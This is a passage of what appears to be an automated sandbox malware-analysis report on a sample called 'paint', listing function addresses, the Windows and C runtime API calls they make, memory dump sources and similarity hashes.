00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB06DA33
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB06DA5C
ReadFile.KERNEL32 ref: 00007FFDFB06DAAF

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB06DB48
winRead, xrefs: 00007FFDFB06DB07

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2600561947-1843600136
Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction ID: 9bc9173a1978978915c82bd02e99611a0ed9a115545c0f38349ff22cf08203b5
Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction Fuzzy Hash: 1441F032F0D64789E7108F15A855DB97766FB55788F044232EA6D836FCDE3CE5429340

Function 00007FF6F0BEF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BEFAEC
_get_daylight.LIBCMT ref: 00007FF6F0BEFAFD
_get_daylight.LIBCMT ref: 00007FF6F0BEFB0E
_isindst.LIBCMT ref: 00007FF6F0BEFBD9

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 4f3525148bb14eb7aed24629eabfcecfb341625919f94f8df42d5689f98b04ac
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: D4512672F08116AAEB14CF74D9516BC27A6AB0135AF914175DE2FD2BE5EF39E401C700

Function 00007FF6F0BE57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6F0BE581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF6F0BE5881
GetLastError.KERNEL32 ref: 00007FF6F0BE5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE5724), ref: 00007FF6F0BE595E

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction ID: 7af00b50604d72ab9806f2ae3be5013dec9a51a9a07b75e2a7c470dc233a74e0
Opcode Fuzzy Hash: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction Fuzzy Hash: E951AC26E086419AFB10DFB1D4603BD23A1AB4AB98F948535DE2E977C9EF39D4418700

Function 00007FF6F0BE5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE56C5
CreateFileW.KERNEL32 ref: 00007FF6F0BE5704
CloseHandle.KERNEL32 ref: 00007FF6F0BE5739

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction ID: cccca9982455505907bd609a329f278d3302aa75bf3c049b2fc4fda44ec7def4
Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction Fuzzy Hash: 1441B322D1C78293E7508B6095203797360FB96764F509374EAAE43BD2EF7DA5E08740

Function 00007FF6F0BDCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BDCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6F0BDCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6F0BDCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6F0BDCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6F0BDCD91

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 8e4c4bb0909cf8ca5eaa2e81ded4e2c9b6fae10a0641351acb7612431c8c09b0
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 20313C25E0E14372FB64AB6498653B997939F47384FC44435E96FC73D3FE2EA40A8240

Function 00007FF6F0BE01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE02E7

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: bddd2f935531eea7d3dd973352540b6ca21a799fa271a0e8de2467b77e01a76e
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 35516061B1924256F7288E659C0067E62D1BF46BA4F944730EE7FC77C5EF3ED4818600

Function 00007FF6F0BEC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6F0BEC33D), ref: 00007FF6F0BEC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6F0BEC33D), ref: 00007FF6F0BEC1FA

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: a1ad9a8724109884aa36773a5892bb64cecb199cb843368319e60c6aae050607
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: F511E362718B8291DB108B25B804169A761FB46BF4FE44331EE7E8B7E9EF3DD0128700

Function 00007FF6F0BE5994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE58A9), ref: 00007FF6F0BE59C7
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE58A9), ref: 00007FF6F0BE59DD

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction ID: 10a3da9776fe792003fb79869f32e99326e3dfa7cfe6ef04e09f855515ad4025
Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction Fuzzy Hash: B6119E7261C60692EB548B50A45117AB7A0FB86771FA01336FAEEC2BD8FF6DD014CB00

Function 00007FF6F0BEABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC36
GetLastError.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC40

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 188da01fbd1217558132e3043fc76005b0ac9a0891bc233e322a14be12081a13
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 2021D511F1CA4262FF905761A89037D5696DF86BA0FA842B5DA3FC73C1EE6DF4458300

Function 00007FF6F0BEBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBF44

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: f44f6f3032b1933a7c1f4286aec8d8bcb5a27749d9fbf57c0ef4dfd71e3e5353
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 7B41F232908201D7EB348B19A44067A77A4EB47B80F904171DAAFC77D2EF2EF402CB91

Function 00007FF6F0BD7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6F0BD802A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 554522ddaaea23f3b5e6aea8caa2321bb654765c5323d1260ad4ea2226cb13d0
Instruction ID: c4ca71f214e1fba252958b26d5fe2d9568249544969e4d9ec9bdc101b91cf29f
Opcode Fuzzy Hash: 554522ddaaea23f3b5e6aea8caa2321bb654765c5323d1260ad4ea2226cb13d0
Instruction Fuzzy Hash: 1D21E721B1965266FB14AB1269047BAE652BF47BC4FCC4430EE2E877C6EE7EE045C640

Function 00007FF6F0BEB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBA32

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 3d1b319e6ae49f0ec4debbcef323aebba5cfcf15e587e925038eadfd4046369b
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 3231E132E18642A5FB115B55984177D2660AF42F94FC202B5EA3F833D2EF7EE8418720

Function 00007FF6F0BE6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE5F69

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 844259b4545c7f2faf098c225a1584e00bf7d74b7241a3aa4d9de9a85b274a03
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: BD116322A1C64291EF609F5194201BEA3A4AF47B80FD540B1EB5ED7BD6EF7EE5408780

Function 00007FFDFB066940 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0669A0

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID:
API String ID: 4225454184-0
Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction ID: 25ca79faa81420d8b57ef299b6a8d2b5d450f08d05728840ef4083db7434d137
Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction Fuzzy Hash: 0C11E711B0A68344EF558B16AA666FE5257DF16FC4F081031FE6D0BBEDEE2CE4825B40

Function 00007FF6F0BF63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF63E7

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 12ece5c7f8db83eeb07587a4dcfa2cbaac6729c9bdb9b5f23357cf0042e842c9
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: F221F972618A4297D7619F58D44037972A4FB86B55F944234EAAFC77D9EF3ED8008B00

Function 00007FF6F0BE042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE0480

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: ef6cb37b68703d6a30644634edae043bd8c9d68e9b5b450b3a4cf76554f29de3
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 8201C461A1874250EB04DF529E01069A6B5BF97FE0F884671EF7D97BDAEE3EE1814300

Function 00007FF6F0BD9070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

LoadLibraryExW.KERNEL32(?,00007FF6F0BD6466,?,00007FF6F0BD336E), ref: 00007FF6F0BD9092

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction ID: 7d3173d434fec1d7020c642541ca7b2e435d2a188fcc3a869de591f1992c8b72
Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction Fuzzy Hash: D9D08C11B2424651EB54A767BA4662A9252AB8ABC0E888035EE2E43B8AEC3DC0414B00

Function 00007FFE0076EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFE0076EE5D), ref: 00007FFE0076EF61

Memory Dump Source

Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true

Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
